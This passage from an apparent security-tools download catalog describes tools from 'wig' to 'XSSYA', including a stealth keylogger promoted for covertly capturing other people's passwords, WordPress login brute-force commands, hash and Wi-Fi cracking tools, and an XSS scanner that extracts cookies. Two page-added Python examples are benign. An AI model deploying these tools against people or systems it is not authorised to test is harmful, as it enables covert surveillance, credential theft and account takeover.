      --verbosity, -v  Increase verbosity. Use multiple times for more info
      --proxy PROXY    Tunnel through a proxy (format: localhost:8080)
      -w OUTPUT_FILE   File to dump results into (JSON)
    

    Example of run:
    $ ./wig.py example.com
    
    dP   dP   dP    dP     .88888.
    88   88   88    88    d8'   `88
    88  .8P  .8P    88    88
    88  d8'  d8'    88    88   YP88
    88.d8P8.d8P     88    Y8.   .88
    8888' Y88'      dP     `88888'
    
      WebApp Information Gatherer
    
    Redirected to http://www.example.com. Continue? [Y|n]:
    
    TITLE
    --- HTML TITLE ---
    
    IP
    255.255.255.256
    
    
    
    SOFTWARE                  VERSION                           CATEGORY
    Drupal                    7.28 | 7.29 | 7.30 | 7.31 | 7.32  CMS
    ASP.NET                   4.0.30319.18067                   Platform
    Microsoft-HTTPAPI         2.0                               Platform
    Microsoft-IIS             6.0 | 7.0 | 7.5 | 8.0             Platform
    Microsoft Windows Server  2003 SP2 | 2008 | 2008 R2 | 2012  Operating System
    
    SOFTWARE                  VULNERABILITIES                   LINK
    Drupal 7.28               7                                 http://cvedetails.com/version/169265
    Drupal 7.29               3                                 http://cvedetails.com/version/169917
    Drupal 7.30               3                                 http://cvedetails.com/version/169916
    
    URL                       NOTE                              CATEGORY
    /login/                   Test directory                    Interesting URL
    /login/index_form.html    ASP.NET detailed error            Interesting URL
    /robots.txt               robots.txt index                  Interesting URL
    /test/                    Test directory                    Interesting URL
    _______________________________________________________________________________
    Time: 15.7 sec            Urls: 351                         Fingerprints: 28989
    


    Download wig

    Windows Spy Keylogger - Software to Log Keystrokes in Stealth Mode for 32-bit/64-bit processes on Windows XP/Vista/7/8/10


    Windows Spy Keylogger is a free software tool to help you covertly monitor all activities on your computer.

    It intercepts everything that is typed on the keyboard and stores it in one log file which you can view anytime later. You can track logins, passwords, emails, chats and all other secret things typed by the user.

    You can also customize various options including stealth mode, run at startup, logfile etc. It is very simple to use with just a click of a button.

    One of the unique features of this tool is that you can install and run it on any computer without administrator permissions. It also works seamlessly on both 32-bit & 64-bit Windows platforms.

    It is suitable for parents who want to monitor activities of their children. Also cyber crime investigators, penetration testers, forensic analysts will find it very handy in their work.

    Windows Spy Keylogger works on all platforms starting from Windows XP to new Windows 10 version.

    Features
    • Free Tool to Monitor Keystrokes in stealth manner
    • Monitor both 32-bit & 64-bit applications
    • Automatically run at Startup
    • No need for administrator privileges
    • Settings dialog to change various options
    • Stores keyboard activities silently to a log file
    • Very easy to use with just a click of button
    • Displays current status of key logger at any time
    • Includes Installer for local installation & un-installation
    How to Use?

    'Windows Spy Keylogger' is a very easy to use tool with its cool GUI interface.
    Here are the simple steps:
    • Run 'Windows Spy Keylogger' on your system
    • It will show you the current status of the Keylogger as seen in the screenshots below.
    • Now you can just click on the button below to Start or Stop the Keylogger
    • That's all :)
    You can also customize various options (run at startup, log path, version check etc) using the 'Settings Dialog' by clicking on the button at the bottom right corner.


    Download Windows Spy Keylogger

    Wireless Network Watcher v1.79 - Show who is connected to your wireless network


    Wireless Network Watcher is a small utility that scans your wireless network and displays the list of all computers and devices that are currently connected to your network. 
    For every computer or device that is connected to your network, the following information is displayed: IP address, MAC address, the company that manufactured the network card, and optionally the computer name. 
    You can also export the connected devices list into html/xml/csv/text file, or copy the list to the clipboard and then paste into Excel or other spreadsheet application.

    Using Wireless Network Watcher

    Wireless Network Watcher doesn't require any installation process or additional dll files. In order to start using it, simply extract the executable file (WNetWatcher.exe) from the zip file, and run it. 
    If you want, you can also download WNetWatcher with full install/uninstall support (wnetwatcher_setup.exe), so a shortcut for running WNetWatcher will be automatically added into your start menu.
    After running WNetWatcher, it automatically locates your wireless adapter, and scans your network. After a few seconds, you should start to see the list of computers that are currently connected to your network. 
    If for some reason WNetWatcher fails to locate and scan your network, you can try choosing the network adapter manually by pressing F9 (Advanced Options) and selecting the right network adapter.

    Columns Description
    • IP Address: IP Address of the device or computer.
    • Device Name: The name of the device or computer. This field may remain empty if the computer or the device doesn't provide its name.
    • MAC Address: The MAC address of the network adapter.
    • Network Adapter Company: The company that manufactured the network adapter, according to the MAC Address. This column can help you to detect the type of the device or computer. For example, if the company name is Apple, the device is probably a Mac computer, iPhone, or iPad; if the company name is Nokia, the device is probably a Nokia cellular phone.

      By default, this utility uses an internal MAC address database stored inside the .exe file, but it's not always updated with the latest MAC address assignments. 
      You can manually download the latest MAC addresses file from http://standards.ieee.org/develop/regauth/oui/oui.txt and then put oui.txt in the same folder where WNetWatcher.exe is located. When you run WNetWatcher.exe, it'll automatically load and use the external oui.txt instead of the internal MAC addresses database.
    • Device Information: This column displays 'Your Computer' if the device is the computer that you currently use. This column displays 'Your Router' if the device is the wireless router.
    • User Text: You can assign your own text to any device detected by WNetWatcher. By default, this field is filled with the device name. In order to change the User Text, simply double-click the item and type the desired text.
    • Active: Specifies whether this device is currently active. When a device is not detected anymore, the 'Active' value is turned from 'Yes' to 'No'.
    Background Scan

    Starting from version 1.15, there is a new option under the Options menu - 'Background Scan'. 
    When it's turned on, Wireless Network Watcher first makes the regular fast network scan to discover all currently connected devices. After that, a continuous background scan is activated to discover when new devices are connected to your network. The background scan is slower and less intensive than the regular scan, so it won't overload your computer and you can leave it to run in the background while using other programs. 
    When the background scan is running, a counter of the scan process is displayed in the second section of the bottom status bar.
    When the background scan is used, you can use the 'Beep On New Device' option to get a beep sound when a new device is detected.

    Command-Line Options
    /cfg <Filename> Start Wireless Network Watcher with the specified configuration file. For example:
    WNetWatcher.exe /cfg "c:\config\wnw.cfg"
    WNetWatcher.exe /cfg "%AppData%\WNetWatcher.cfg"
    /stext <Filename> Scan your network, and save the network devices list into a regular text file.
    /stab <Filename> Scan your network, and save the network devices list into a tab-delimited text file.
    /scomma <Filename> Scan your network, and save the network devices list into a comma-delimited text file (csv).
    /stabular <Filename> Scan your network, and save the network devices list into a tabular text file.
    /shtml <Filename> Scan your network, and save the network devices list into HTML file (Horizontal).
    /sverhtml <Filename> Scan your network, and save the network devices list into HTML file (Vertical).
    /sxml <Filename> Scan your network, and save the network devices list into XML file.    



    Download Wireless Network Watcher v1.79

    Wireless Network Watcher v1.81 - Show Who is Connected to your Wireless Network


    Wireless Network Watcher is a small utility that scans your wireless network and displays the list of all computers and devices that are currently connected to your network.

    For every computer or device that is connected to your network, the following information is displayed: IP address, MAC address, the company that manufactured the network card, and optionally the computer name.

    You can also export the connected devices list into html/xml/csv/text file, or copy the list to the clipboard and then paste into Excel or other spreadsheet application.

    Using Wireless Network Watcher

    Wireless Network Watcher doesn't require any installation process or additional dll files. In order to start using it, simply extract the executable file (WNetWatcher.exe) from the zip file, and run it.

    If you want, you can also download WNetWatcher with full install/uninstall support (wnetwatcher_setup.exe), so a shortcut for running WNetWatcher will be automatically added into your start menu.

    After running WNetWatcher, it automatically locates your wireless adapter, and scans your network. After a few seconds, you should start to see the list of computers that are currently connected to your network.

    If for some reason WNetWatcher fails to locate and scan your network, you can try choosing the network adapter manually by pressing F9 (Advanced Options) and selecting the right network adapter.

    Columns Description
    • IP Address: IP Address of the device or computer.
    • Device Name: The name of the device or computer. This field may remain empty if the computer or the device doesn't provide its name.
    • MAC Address: The MAC address of the network adapter.
    • Network Adapter Company: The company that manufactured the network adapter, according to the MAC Address. This column can help you to detect the type of the device or computer. For example, if the company name is Apple, the device is probably a Mac computer, iPhone, or iPad; if the company name is Nokia, the device is probably a Nokia cellular phone.

      By default, this utility uses an internal MAC address database stored inside the .exe file, but it's not always updated with the latest MAC address assignments. 
      You can manually download the latest MAC addresses file from http://standards.ieee.org/develop/regauth/oui/oui.txt and then put oui.txt in the same folder where WNetWatcher.exe is located. When you run WNetWatcher.exe, it'll automatically load and use the external oui.txt instead of the internal MAC addresses database.
    • Device Information: This column displays 'Your Computer' if the device is the computer that you currently use. This column displays 'Your Router' if the device is the wireless router.
    • User Text: You can assign your own text to any device detected by WNetWatcher. By default, this field is filled with the device name. In order to change the User Text, simply double-click the item and type the desired text.
    • Active: Specifies whether this device is currently active. When a device is not detected anymore, the 'Active' value is turned from 'Yes' to 'No'.
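    Both Wireless Network Watcher entries above explain the same lookup: the first three octets of a MAC address are an OUI, and the IEEE oui.txt file maps each OUI to the organization that registered it. The block below is an added example written for this page, not code from Wireless Network Watcher; it parses the oui.txt layout and labels a scanner-style device list. The registry excerpt and the device list are constructed for the example (the OUIs and company names are invented). It also handles the case the vendor column cannot cover: a MAC with the locally-administered bit set (as randomized Wi-Fi addresses on modern phones have) carries no vendor OUI, so the example flags it instead of guessing.

```python
import re

# Constructed excerpt in the layout of the IEEE oui.txt registry. The assignments
# below are invented for this example; they are not real IEEE registry entries.
SAMPLE_OUI_TXT = """\
OUI/MA-L                                                    Organization
company_id                                                  Organization
                                                            Address

00-00-0A   (hex)        Example Networks Inc.
00000A     (base 16)    Example Networks Inc.
                        1 Example Way
                        Springfield  US

A4-BB-CC   (hex)        Sample Router Co
A4BBCC     (base 16)    Sample Router Co
                        2 Sample Road
                        Springfield  US
"""

# Only the "(hex)" line of each entry carries the OUI and the organization name.
_HEX_LINE = re.compile(
    r"^([0-9A-Fa-f]{2})-([0-9A-Fa-f]{2})-([0-9A-Fa-f]{2})\s+\(hex\)\s+(.*\S)\s*$"
)


def parse_oui(text):
    """Parse oui.txt-style text into {'A4BBCC': 'Sample Router Co', ...}."""
    table = {}
    for line in text.splitlines():
        m = _HEX_LINE.match(line)
        if m:
            table[(m.group(1) + m.group(2) + m.group(3)).upper()] = m.group(4)
    return table


def normalize_mac(mac):
    """Accept aa:bb:cc:dd:ee:ff, AA-BB-CC-DD-EE-FF or aabb.ccdd.eeff; return 12 upper-case hex digits."""
    digits = re.sub(r"[^0-9A-Fa-f]", "", mac).upper()
    if len(digits) != 12:
        raise ValueError(f"not a 48-bit MAC address: {mac!r}")
    return digits


def is_locally_administered(mac):
    """True when bit 1 of the first octet is set: the address was assigned by software
    (for example a randomized Wi-Fi MAC), so its first three octets are not a vendor OUI."""
    return bool(int(normalize_mac(mac)[0:2], 16) & 0x02)


def lookup_vendor(mac, table):
    """Vendor name for a MAC, or a marker explaining why none can be given."""
    digits = normalize_mac(mac)
    if int(digits[0:2], 16) & 0x02:
        return "(locally administered / randomized)"
    return table.get(digits[:6], "(unknown)")


def label_devices(devices, table):
    """devices: [(ip, mac)] as a scanner would report them. Returns [(ip, mac, vendor)]."""
    return [(ip, mac, lookup_vendor(mac, table)) for ip, mac in devices]


DEMO_TABLE = parse_oui(SAMPLE_OUI_TXT)

# Constructed device list, not output from a real scan.
DEMO_DEVICES = [("192.0.2.10", "00:00:0a:12:34:56"),
                ("192.0.2.11", "a4-bb-cc-00-00-01"),
                ("192.0.2.12", "02:00:00:00:00:01"),
                ("192.0.2.13", "10:34:56:78:9a:bc")]

if __name__ == "__main__":
    for ip, mac, vendor in label_devices(DEMO_DEVICES, DEMO_TABLE):
        print(f"{ip:<15} {mac:<20} {vendor}")
```

    To use a current registry instead of the constructed excerpt, read the downloaded oui.txt into parse_oui; the "(hex)" line format is the part the parser depends on. Treat the vendor column as a hint only: a phone with MAC randomization enabled shows up as locally administered and may appear under a new address on each connection, so a device inventory keyed on MAC alone will drift.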

    Background Scan

    Starting from version 1.15, there is a new option under the Options menu - 'Background Scan'.

    When it's turned on, Wireless Network Watcher first makes the regular fast network scan to discover all currently connected devices. After that, a continuous background scan is activated to discover when new devices are connected to your network. The background scan is slower and less intensive than the regular scan, so it won't overload your computer and you can leave it to run in the background while using other programs.

    When the background scan is running, a counter of the scan process is displayed in the second section of the bottom status bar.

    When the background scan is used, you can use the 'Beep On New Device' option to get a beep sound when a new device is detected.

    Command-Line Options
    /cfg <Filename> Start Wireless Network Watcher with the specified configuration file. For example:
    WNetWatcher.exe /cfg "c:\config\wnw.cfg"
    WNetWatcher.exe /cfg "%AppData%\WNetWatcher.cfg"
    /stext <Filename> Scan your network, and save the network devices list into a regular text file.
    /stab <Filename> Scan your network, and save the network devices list into a tab-delimited text file.
    /scomma <Filename> Scan your network, and save the network devices list into a comma-delimited text file (csv).
    /stabular <Filename> Scan your network, and save the network devices list into a tabular text file.
    /shtml <Filename> Scan your network, and save the network devices list into HTML file (Horizontal).
    /sverhtml <Filename> Scan your network, and save the network devices list into HTML file (Vertical).
    /sxml <Filename> Scan your network, and save the network devices list into XML file.    


    Download Wireless Network Watcher v1.81

    Wireshark v2.0 - The World’s Foremost Network Protocol Analyzer


    Wireshark is the world’s foremost network protocol analyzer. It lets you capture and interactively browse the traffic running on a computer network. It is the de facto (and often de jure) standard across many industries and educational institutions.

    Wireshark development thrives thanks to the contributions of networking experts across the globe. It is the continuation of a project that started in 1998.

    Wireshark 2.0.0rc2 has been released. This is the second release candidate for Wireshark 2.0. Installers for Windows, OS X, and source code are now available.
    The following features are new (or have been significantly updated) since version 2.0.0rc1:
    • For new installations on UN*X, the directory for user preferences is $HOME/.config/wireshark rather than $HOME/.wireshark. If that directory is absent, preferences will still be found and stored under $HOME/.wireshark.
    • Qt port:
      • The SIP Statistics dialog has been added.
      • You can now create filter expressions from the display filter toolbar.
      • Bugs in the UAT preferences dialog have been fixed.
    • Several dissector and Qt UI crash bugs have been fixed.
    • Problems with the Mac OS X application bundle have been fixed.
    The following features are new (or have been significantly updated) since version 1.99.9:
    • Qt port:
      • The LTE RLC Graph dialog has been added.
      • The LTE MAC Statistics dialog has been added.
      • The LTE RLC Statistics dialog has been added.
      • The IAX2 Analysis dialog has been added.
      • The Conversation Hash Tables dialog has been added.
      • The Dissector Tables dialog has been added.
      • The Supported Protocols dialog has been added.
      • You can now zoom the I/O and TCP Stream graph X and Y axes independently.
      • The RTP Player dialog has been added.
      • Several memory leaks have been fixed.

    Changes in Wireshark 2.0

    Capture options. Capture options have been simplified and consolidated. In 1.12 they are spread out in many places across several windows. In 2.0 they are in two places: the Capture Options dialog (Capture→Options or the “gear” icon in the toolbar) and the Manage Interfaces dialog, which you can open by pressing “Manage Interfaces” in the Capture Options dialog.

    Streamlined preferences. Preferences windows usually aren’t something to get excited about and this is no exception, but it’s important to note that in the process of removing clutter some preferences have been removed from the main window. They’re still available in the “Advanced” preference section which lists every available preference item.

    Translations. Thanks to the hard work of many contributors the new interface supports multiple languages. You can now select between Chinese, English, French, German, Italian, Japanese, and Polish in the “Appearance” preferences section. Many more translations are underway. You can see the status of the translation efforts and help out with the effort at https://www.transifex.com/wireshark/wireshark/.

    Related packets. As you scroll through the packet list you might notice little symbols pop up along its left edge. For example, you might see left and right arrows for DNS requests and replies, or a check mark to denote an ACKed TCP packet. These are related packets. This exposes some plumbing we’ve had in place for a long time, but it’s now shown in the main window instead of buried deep in the packet detail tree.

    Intelligent scrollbar. As you scroll through the packet list you might notice that the scroll bar itself looks odd. It now features a map of nearby packets, similar to the “minimap” available in many modern text editors. The number of packets shown in the map is the same as the number of physical vertical pixels in your scrollbar. The more pixels you have, the more packets you can see. In other words, if you use Wireshark regularly you now have a legitimate business case for a retina display.

    Statistics dialogs. The dialogs under the Statistics and Telephony menus have seen many improvements. The backend code has been consolidated so that most of Wireshark’s statistics now share common internal logic. This in turn let us create common UI code with many workflow improvements and a much more consistent interface.

    I/O Graph dialog. You can now graph as many items as you like and save graphs as PDF, PNG, JPEG, and BMP. Graph settings stay with your profile so you can customize them for multiple environments.

    Follow Stream dialog. You can now switch between streams and search for text.

    General dialogs. Many dialogs now have context-aware hints. For example the I/O Graph and Follow Stream dialogs will tell you which packet corresponds to the graph or stream data under your cursor. Most of them will stay open after you close a capture file so that you can compare statistics or graphs between captures.

    Woodpecker hash Bruteforce - Multithreaded program to perform a brute-force attack against a hash


    Woodpecker hash Bruteforce is a fast and easy-to-use multithreaded program to perform a brute-force attack against a hash. It supports many common hashing algorithms such as md5, sha1, etc. It runs on Windows and Mac OS. You can use dictionary, alphabet-based or random bruteforce.

    Here  you can download Woodpecker hash Bruteforce for Windows and Mac OS.

    How to use:
    1. Open cmd.exe on Windows or Terminal on Mac OS
    2. Drag downloaded file in the terminal
    3. Hit space (if it wasn't added automatically after the filename) and type "--help" (with two dashes)
    4. Some help will be shown to you
    5. You may want to run the examples first
    6. Start bruteforcing!
    Supported hash types:
    • MD2 – 32 characters
    • MD4 – 32 characters
    • MD5 – 32 characters
    • SHA1 – 40 characters
    • SHA224 – 56 characters
    • SHA256 – 64 characters
    • SHA384 – 96 characters
    • SHA512 – 128 characters
    Supported bruteforce types:
    • Dummy – tries all letter combinations from the given alphabet
    • Random – tries random letter combinations from the given alphabet (use if the other types do not succeed)
    • Wordlist-based – uses the words from the given wordlist

    News
    • 22.02.2015 - Version 0.9.1 is here!
      1. Ability to start program by double-clicking it (beta)
      2. Bug fixes, stability and speed improvements
    • 20.02.2015 - Version 0.9 is out!
      1. Finally, Woodpecker hash Bruteforce is now multithreaded on both Windows and Mac OS!
      2. Bug fixes, stability, speed and interface improvements
    • 8.02.2015 - Version 0.8 is out!
      1. Ability to start interrupted session using '-R' flag
      2. New bruteforce type - random bruteforce using '-r' flag
      3. Results are now saved in case of sudden termination
      4. Bug fixes, stability, speed and interface improvements
    • 16.01.2015 - Version 0.7 published!
      1. Bug fixes and stability improvements (fixed the alphabet bug on Windows)
      2. Slight speed and logic improvements
    • 28.12.2014 - Added video tutorial in the bottom of the "Tutorial" page
    • 7.12.2014 - Version 0.6 published!
      1. Now works better with dictionaries and wordlists
      2. You can supply your own alphabet
      3. Now you are able to save results


    Download Woodpecker hash Bruteforce

    Wordbrutepress - Wordpress Brute Force Multithreading with Standard and XML-RPC Login Method

    Wordpress Brute Force Multithreading with standard and xml-rpc login method written in python.

    Features:
    1. Multithreading
    2. xml-rpc brute force mode
    3. http and https protocols support
    4. Random User Agent
    5. Big wordlist support

    Usage:
    Standard login request:
    
    python wordbrutepress.py -S -t http[s]://target.com[:port] -u username -w wordlist [--timeout in sec]
    
    Xml-rpc login request:
    
    python wordbrutepress.py -X -t http[s]://target.com[:port] -u username -w wordlist [--timeout in sec]

    CHANGELOG
     2015-11-20 v2.1
     1) Add new feature: Big wordlist support (thanks to guly @theguly)
     2) Fix faultcode check instead of "403" code for XML-RPC (thanks to guly @theguly)
    
     2015-04-12 v2.0
     1) Add new feature: xml-rpc brute force mode
     2) Fix minor bugs
    
     2015-04-11 v1.1
     1) optparse (Deprecated since version 2.7) replaced by argparse
     2) Fix connection bugs


    Download Wordbrutepress

    WPHardening 1.5 - Fortify the security of any WordPress installation


    Fortify the security of any WordPress installation.

    Installation

    Installing WPHardening requires you to execute one console command:
    $ pip install -r requirements.txt

    Usage
    $ python wphardening.py -h 
    
     __          _______  _    _               _            _
     \ \        / /  __ \| |  | |             | |          (_)
      \ \  /\  / /| |__) | |__| | __ _ _ __ __| | ___ _ __  _ _ __   __ _
       \ \/  \/ / |  ___/|  __  |/ _` | '__/ _` |/ _ \ '_ \| | '_ \ / _` |
        \  /\  /  | |    | |  | | (_| | | | (_| |  __/ | | | | | | | (_| |
         \/  \/   |_|    |_|  |_|\__,_|_|  \__,_|\___|_| |_|_|_| |_|\__, |
                                                                     __/ |
            Fortify the security of any WordPress installation.     |___/
    
               Sponsored by SYHUNT - http://www.syhunt.com
    
    Usage: python wphardening.py [options]
    
    Options:
      --version             show program's version number and exit
      -h, --help            show this help message and exit
      -v, --verbose         Active verbose mode output results
      --update              Check for WPHardening latest stable version
    
      Target:
        This option must be specified to modify the package WordPress.
    
        -d DIRECTORY, --dir=DIRECTORY
                            **REQUIRED** - Working Directory.
        --load-conf=FILE    Load file configuration.
    
      Hardening:
        Different tools to hardening WordPress.
    
        -c, --chmod         Chmod 755 in directory and 644 in files.
        -r, --remove        Remove files and directory.
        -b, --robots        Create file robots.txt
        -f, --fingerprinting
                            Deleted fingerprinting WordPress.
        -t, --timthumb      Find the library TimThumb.
        --chown=user:group  Changing file and directory owner.
        --wp-config         Wizard generated wp-config.php
        --plugins           Download Plugins Security.
        --proxy=PROXY       Use a HTTP proxy to connect to the target url for
                            --plugins and --wp-config.
        --indexes           It allows you to display the contents of directories.
        --minify            Compressing static file .css and .js
        --malware-scan      Malware Scan in WordPress project.
    
      Miscellaneous:
        -o FILE, --output=FILE
                            Write log report to FILE.log
    

    Examples

    Check a WordPress Project
    Before using the tool, we must ensure that our working directory is a WordPress installation.
    $ python wphardening.py -d /home/path/to/wordpress -v

    Change permissions
    This option is to add the correct permissions to files and directories.
    $ python wphardening.py -d /home/path/to/wordpress --chmod -v
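    The --chmod option applies the policy the help screen states: 755 on directories and 644 on files. The block below is an added example written for this page, not WPHardening's own code; it audits a tree against that policy, reports every deviation in octal, and can apply the fix. It builds its own throwaway tree with deliberately wrong modes (constructed placeholders, not a real WordPress site) so it runs offline; point audit_permissions at a real document root to use it for a check.

```python
import os
import stat
import tempfile

# Policy the --chmod option applies: 755 on directories, 644 on files.
DIR_MODE = 0o755
FILE_MODE = 0o644


def audit_permissions(root):
    """Walk root and return sorted [(relative_path, actual_mode, expected_mode)] for every
    directory or file whose permission bits differ from the policy. Symlinks are skipped
    because their own mode bits are meaningless."""
    entries = [(root, DIR_MODE)]
    for dirpath, dirnames, filenames in os.walk(root):
        entries += [(os.path.join(dirpath, d), DIR_MODE) for d in dirnames]
        entries += [(os.path.join(dirpath, f), FILE_MODE) for f in filenames]
    findings = []
    for path, expected in entries:
        if os.path.islink(path):
            continue
        actual = stat.S_IMODE(os.lstat(path).st_mode)
        if actual != expected:
            findings.append((os.path.relpath(path, root), actual, expected))
    return sorted(findings)


def apply_policy(root, findings):
    """chmod each reported entry to its expected mode; returns the number of entries changed."""
    for rel, _actual, expected in findings:
        os.chmod(os.path.join(root, rel), expected)
    return len(findings)


def format_findings(findings):
    """Render modes in octal the way chmod users expect, e.g. 'wp-content: 777 -> 755'."""
    return [f"{rel}: {actual:o} -> {expected:o}" for rel, actual, expected in findings]


def build_demo_tree():
    """Create a throwaway tree with deliberately wrong modes.
    Constructed sample; the file contents are placeholders, not a real WordPress site."""
    root = tempfile.mkdtemp(prefix="wp-demo-")
    os.chmod(root, DIR_MODE)
    content = os.path.join(root, "wp-content")
    os.mkdir(content)
    os.chmod(content, 0o777)                        # world-writable directory
    for name, mode in (("wp-config.php", 0o666),    # world-writable file
                       ("index.php", 0o644)):       # already compliant
        with open(os.path.join(root, name), "w") as fh:
            fh.write("<?php // constructed placeholder\n")
        os.chmod(os.path.join(root, name), mode)
    return root


def demo_run():
    """Build the sample tree, audit it, fix it, and audit again; returns (before, after)."""
    root = build_demo_tree()
    before = audit_permissions(root)
    apply_policy(root, before)
    return before, audit_permissions(root)


if __name__ == "__main__":
    before, after = demo_run()
    print("\n".join(format_findings(before)))
    print("after fix:", after)
```

    The world-writable entries are the ones that matter for a web root: 777 on wp-content or 666 on wp-config.php lets any local account, including a compromised neighbouring site on shared hosting, rewrite the files the web server executes. Many deployments tighten wp-config.php beyond the 644 shown here; if yours does, add that file as an exception to the policy rather than letting a later --chmod run loosen it again.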

    Remove files that are not used
    Part of the fortification of any system is to remove those files, directories or components that are not required.
    $ python wphardening.py -d /home/path/to/wordpress --remove -v

    Create your robots.txt file
    By default WordPress does not include a robots.txt file; with this option we can create and customize our robots.txt.
    $ python wphardening.py -d /home/path/to/wordpress --robots -v
    For more information on robots.txt

    Remove all fingerprinting and Version
    $ python wphardening.py -d /home/path/to/wordpress --fingerprinting -v

    Check a TimThumb library
    $ python wphardening.py -d /home/path/to/wordpress --timthumb -v

    Create Index file
    This file is created to prevent directory browsing (directory listing) in a directory.
    $ python wphardening.py -d /home/path/to/wordpress --indexes -v

    Download Plugins security
    The following is a list of the most commonly used security plugins that you can download automatically:
    $ python wphardening.py -d /home/path/to/wordpress --plugins

    Wizard generated wp-config.php
    This command automatically creates a file called wp-config-wphardening.php, which you can then rename.
    $ python wphardening.py -d /home/path/to/wordpress --wp-config

    WPHardening update
    With this option you can always have the latest version of WPHardening.
    $ python wphardening.py --update

    Use all options
    $ python wphardening.py -d /home/path/to/wordpress -c -r -f -t --wp-config --indexes --plugins -o /home/user/wphardening.log


    Download WPHardening 1.5

    WS-Attacker - Modular Framework for Web Services Penetration Testing


    XML-based SOAP Web Services are a widely used technology that allows users to execute remote operations and transport arbitrary data. It is currently adopted in Service Oriented Architectures, cloud interfaces, management of federated identities, eGovernment, and military services. The wide adoption of this technology has resulted in the emergence of numerous, mostly complex, extension specifications. Naturally, this has been followed by a rise in the number of Web Services attacks.

    When implementing common web applications, developers evaluate the security of their systems by applying different penetration testing tools. However, in comparison to well-known attacks such as SQL injection or Cross Site Scripting, there exist no penetration testing tools for Web Services specific attacks. With WS-Attacker we intend to close this gap and provide developers and penetration testers with automatic methods for detecting Web Services specific attacks. The tool currently supports the following attacks:
    • SOAPAction Spoofing
    • WS-Addressing Spoofing
    • Various XML Denial of Service variants
    • XML Signature Wrapping

    Download WS-Attacker

    Xiaopan OS - Pentesting Distribution for Wireless Security Enthusiasts


    Xiaopan OS is an easy to use software package for beginners and experts that includes a number of advanced tools to penetrate wireless networks. Based on the Tiny Core Linux (TCL) operating system (OS), it has a slick graphical user interface (GUI) that requires no typing of Linux commands. Xiaopan OS is Windows, Mac and Linux compatible, and users can simply install and boot this ~70mb OS from a USB pen drive or in a virtual machine (VM) environment.

    Alternatives

    There are a number of professional operating systems that have been developed specifically for pentesting and security auditing, all of which are based on Linux. These include Kali, BackTrack and WiFiway. What sets Xiaopan OS apart from its competitors is that it is simple to use and just works, depending on a number of variables and provided you have all the right hardware, of course.

    Tools

    Xiaopan OS includes a number of tools to hack Wi-Fi Protected Setup (WPS), Wi-Fi Protected Access (WPA) and Wired Equivalent Privacy (WEP) encrypted networks:

    • Reaver: a newly developed application with the ability to brute-force WPS (WPA / WPA2) PINs.
    • Inflator: this is the GUI version of the command-line Reaver.
    • Aircrack-ng: the major backbone of many other Xiaopan tools, including FeedingBottle (FB) and Minidwep, with the ability to attack WPA networks through a dictionary attack and WEP networks by collecting and injecting packets.
    • FeedingBottle: so easy a baby could use it! FB is essentially the Aircrack-ng GUI and was created by Beini.
    • Minidwep: similar to FB, but with a comparable GUI that is even easier to use than FB. The added advantage of Minidwep is that you can also run Reaver and Inflator from it.
    • Xfe: this is a simple file manager, similar to Windows Explorer.

    Download Xiaopan OS

    XPL-SEARCH - Search Exploits In Multiple Exploit Databases


    XPL SEARCH
    Search exploits in multiple exploit databases!
     Exploit databases available:
     * Exploit-DB
     * Milw0rm
     * PacketStormSecurity
     * IntelligentExploit
     * IEDB
     * CVE
    

    TO RUN THE SCRIPT
    PHP Version (cli) 5.5.8 or higher
     php5-cli         Lib
    cURL support      Enabled
     php5-curl        Lib
    cURL Version      7.40.0 or higher
    allow_url_fopen   On
    Permission        Writing & Reading
    

    ABOUT DEVELOPER
    Author_Nick       CoderPIRATA
    Author_Name       Eduardo
    Email             coderpirata@gmail.com
    Blog              http://coderpirata.blogspot.com.br/
    Twitter           https://twitter.com/coderpirata
    Google+           https://plus.google.com/103146866540699363823
    Pastebin          http://pastebin.com/u/CoderPirata
    Github            https://github.com/coderpirata/
    

    "CHANGELOG"
    0.1 - [02/07/2015]
    - Started.
    
    0.2 - [12/07/2015]
    - Added Exploit-DB.
    - Added Colors, only for linux!
    - Added Update Function.
    - "Generator" of User-Agent reworked.
    - Small errors and adaptations.
    
    0.3 - [22/07/2015]
    - Bugs solved.
    - Added "save" Function.
    - Added "set-db" function.
    
    0.4 - [05/08/2015]
    - Save function modified.
    - Added Scan with list.
    
    0.5 - [29/08/2015]
    - Added search by Author.
    
    0.6 - [09/09/2015]
    - Now displays the author of the exploit.
     * Does not work with IntelligentExploit.
    - Changes in search logs.
    
    0.7 - [11/09/2015]
    - Added search in CVE.
     * ID.
     * Simple search - id 6.
    - Bug in exploit-db search, "papers" fixed.
    - Added standard time of 60 seconds for each request.
    - file_get_contents() was removed from "browser()".
    - Code of milw00rm search has been modified.
    - Changes in search logs.
    - Added date.
    
    0.7.1 - [17/09/2015]
    - Bug in milw00rm solved
    
    0.8 - [05/10/2015]
    - Added shebang.
    - Commands "save", "save-log" and "save-dir" have been modified.
    - Added "no-db" option.
    - GETOPT() modified - Thanks Jack2.
    - Bug on save-dir solved.
    - Other minor bugs solved.
    


    Download XPL-SEARCH

    Xplico v1.1.1 - Open Source Network Forensic Analysis Tool (NFAT)


    The goal of Xplico is to extract the application data contained in an Internet traffic capture.

    For example, from a pcap file Xplico extracts each email (POP, IMAP, and SMTP protocols), all HTTP contents, each VoIP call (SIP), FTP, TFTP, and so on. Xplico isn’t a network protocol analyzer. Xplico is an open source Network Forensic Analysis Tool (NFAT).

    Features
    • Protocols supported: HTTP, SIP, IMAP, POP, SMTP, TCP, UDP, IPv6, …;
    • Port Independent Protocol Identification (PIPI) for each application protocol;
    • Multithreading;
    • Output data and information to an SQLite database or a MySQL database and/or files;
    • Each piece of data reassembled by Xplico is associated with an XML file that uniquely identifies the flows and the pcap containing the reassembled data;
    • Real-time processing (depends on the number of flows, the types of protocols and on the performance of the computer: RAM, CPU, HD access time, …);
    • TCP reassembly with ACK verification for every packet, or soft ACK verification;
    • Reverse DNS lookup from the DNS packets contained in the input files (pcap), not from an external DNS server;
    • No size limit on input data or on the number of input files (the only limit is HD size);
    • IPv4 and IPv6 support;
    • Modularity. Each Xplico component is modular. The input interface, the protocol decoder (Dissector) and the output interface (dispatcher) are all modules;
    • The ability to easily create any kind of dispatcher with which to organize the extracted data in the way most appropriate and useful to you;

    Download Xplico

    XSSYA v2.0 - Cross Site Scripting Scanner & Vulnerability Confirmation


    XSSYA, a Cross Site Scripting scanner and vulnerability confirmation tool written in the Python scripting language, confirms an XSS vulnerability using two methods. The first method executes the payload in encoded form to bypass a Web Application Firewall and checks the request and response; if the server responds with 200, the tool moves on to Method 2, which searches for the decoded payload in the HTML code of the web page. If the vulnerability is confirmed, the last step executes document.cookie to get the cookie.

    What have been changed?
